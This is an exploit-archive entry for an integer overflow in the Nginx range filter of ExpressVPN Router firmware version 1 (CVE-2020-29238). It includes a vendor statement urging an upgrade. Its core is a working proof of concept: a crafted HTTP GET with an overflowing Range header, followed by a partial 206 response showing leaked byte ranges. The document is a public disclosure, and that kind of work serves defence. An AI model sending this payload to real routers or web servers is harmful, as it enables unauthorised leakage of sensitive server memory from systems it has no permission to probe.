# Exploit Title: ExpressVPN VPN Router 1.0 - Router Login Panel's Integer Overflow # Date: 09-04-2021 # Exploit Author: Jai Kumar Sharma # Vendor Homepage: https://www.expressvpn.com/ # Software Link: https://www.expressvpn.com/vpn-software/vpn-router # Version: version 1 # Tested on: Windows/Ubuntu/MacOS # CVE : CVE-2020-29238 *Proof of concept*: ExpressVPN Router's Login Panel runs on Nginx webserver, the version v1 of the router's firmware hosts web login panel on vulnerable web server ExpressVPN Summary: A publicly known bug in the Nginx server used by the ExpressVPN Router version 1.x firmware was reported. ExpressVPN no longer ships or supports that version and all users are encouraged to upgrade to the latest version of the ExpressVPN Router firmware available on our site, which is not vulnerable to this bug. Additionally, we highly discourage our users from exposing their router control panel to the Internet, as this class of bug would only be exploitable with access to the control panel, which is usually restricted to the local network. For help or support upgrading your router please visit: https://www.expressvpn.com/support/ ExpressVPN Router version 1 is vulnerable to integer overflow vulnerability in Nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request. Crafted Request: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Host: 127.0.0.1:8181 Accept-Encoding: identity Range: bytes=-17208,-9223372036854758999 Connection: close Response: HTTP/1.1 206 Partial Content Server: nginx/1.9.15 Date: Tue, 10 Nov 2020 19:22:05 GMT Content-Type: multipart/byteranges; boundary=00000000002 Content-Length: 598 Last-Modified: Thu, 13 Sep 2018 04:55:28 GMT Connection: close ETag: "5b99edc0-99f" --00000000002 Content-Type: text/html Content-Range: bytes -14745-2462/2463